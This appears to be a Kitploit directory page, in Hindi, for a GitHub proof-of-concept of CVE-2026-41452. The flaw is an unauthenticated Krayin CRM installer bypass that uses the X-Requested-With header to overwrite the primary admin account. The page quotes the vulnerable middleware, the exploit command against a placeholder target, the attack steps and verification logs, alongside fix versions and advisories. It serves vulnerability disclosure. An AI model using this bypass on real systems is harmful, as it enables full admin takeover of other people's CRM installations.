Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-41452-PoC — CVE-2026-41452 — Krayin CRM में बिना प्रमाणीकरण वाला इंस्टॉलर बायपास (X-Requested-With) → एडमिन टेकओवर। सत्यापित: 2.2.4 पर ओवरराइट + लॉगिन, 2.2.5 पर अवरुद्ध। | Kitploit
उपकरण/GitHubGitHub/boreas37/cve-2026-41452-poc
प्रमाणीकरण और प्राधिकरणभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubboreas37/cve-2026-41452-poc

CVE-2026-41452-PoC

CVE-2026-41452 — Krayin CRM में बिना प्रमाणीकरण वाला इंस्टॉलर बायपास (X-Requested-With) → एडमिन टेकओवर। सत्यापित: 2.2.4 पर ओवरराइट + लॉगिन, 2.2.5 पर अवरुद्ध।

रिपॉजिटरी देखें
41228 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-41452 — Krayin CRM इंस्टॉलर प्रमाणीकरण बाईपास → एडमिन टेकओवर

CVSS 9.8 (गंभीर) · CWE-287 / CWE-306 · Jiva विश्लेषण · VulnCheck

सारांश

Krayin CRM का इंस्टॉलर POST /install/api/admin-config-setup (साथ ही run-migration, run-seeder) को CSRF सुरक्षा के बिना उजागर करता है (withoutMiddleware('web') ग्रुप)। CanInstall ग्लोबल मिडलवेयर केवल गैर-AJAX अनुरोधों के लिए रूट को ब्लॉक करता है:

root@kitploit:~
// app/Http/Middleware/CanInstall.php
if ($this->isAlreadyInstalled() && ! $request->ajax()) {
    return redirect()->route('admin.dashboard');
}

X-Requested-With: XMLHttpRequest भेजने से यह चेक पूरी तरह स्किप हो जाता है। इसके बाद कंट्रोलर हार्डकोडेड प्राथमिक एडमिन (user id=1) को हमलावर द्वारा प्रदान किए गए name/email/password (role_id=1, status=1) के साथ updateOrInsert करता है → पहले से इंस्टॉल्ड इंस्टेंस पर बिना प्रमाणीकरण के पूर्ण एडमिन टेकओवर।

प्रभावित: ≤ 2.2.0 और 2.2.4 (रिग्रेशन)। फिक्स: 2.2.1 (e4eb96f5), 2.2.4 में रिग्रेशन (6a7bc4cc), 2.2.5 में दोबारा फिक्स (ea4919a8)। शोध के समय master ब्रांच अभी भी असुरक्षित थी।

एक्सप्लॉइट

root@kitploit:~
python3 poc_cve-2026-41452.py http://TARGET newadmin [email protected] 'NewPass@123'

श्रृंखला:

  1. बेसलाइन: गैर-AJAX POST → ब्लॉक हुआ (302 रिडायरेक्ट) — साबित करता है कि मिडलवेयर सामान्य अनुरोधों के लिए काम करता है
  2. AJAX POST X-Requested-With: XMLHttpRequest → HTTP 200 1 → एडमिन (id=1) ओवरराइट हो गया
  3. नए क्रेडेंशियल्स के साथ /admin/login पर लॉगिन करें → /admin/dashboard पर रिडायरेक्ट
  4. डैशबोर्ड रेंडर होता है → टेकओवर की पुष्टि

सत्यापन (2026-08-12, Docker लैब, ARM64)

root@kitploit:~
[0] NON-AJAX POST -> HTTP 302 (blocked by CanInstall)        [OK control]
[1] AJAX POST /install/api/admin-config-setup -> HTTP 200 '1' [OK overwrite]
[2] login [email protected] -> HTTP 302 /admin/dashboard          [OK]
[3] GET /admin/dashboard -> HTTP 200 (full dashboard)          [OK]
=== VERDICT: CVE-2026-41452 EXPLOITABLE ===

फिक्स्ड-बिल्ड तुलना: v2.2.5 फाइलों के साथ वही AJAX POST → HTTP 403 (ब्लॉक किया गया)।

प्रभाव

कोई भी सार्वजनिक रूप से सुलभ Krayin CRM इंस्टॉलेशन (v2.2.4 या ≤2.2.0) एक अनप्रमाणित हमलावर द्वारा एक ही अनुरोध में पूरी तरह से टेकओवर किया जा सकता है। न CSRF की आवश्यकता है, न क्रेडेंशियल्स की, न किसी इंटरैक्शन की।

संदर्भ

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-41452
  • Jiva Security विश्लेषण: https://jivasecurity.com/writeups/krayin-installer-bypass-account-takeover-cve-2026-41452
  • VulnCheck एडवाइजरी: https://www.vulncheck.com/advisories/krayin-crm-missing-authentication-via-install-api-admin-config-setup
  • फिक्स: ea4919a8 (v2.2.5) · रिग्रेशन: 6a7bc4cc (v2.2.4) · पहला फिक्स: e4eb96f5 (v2.2.1)
टूल डाउनलोड करें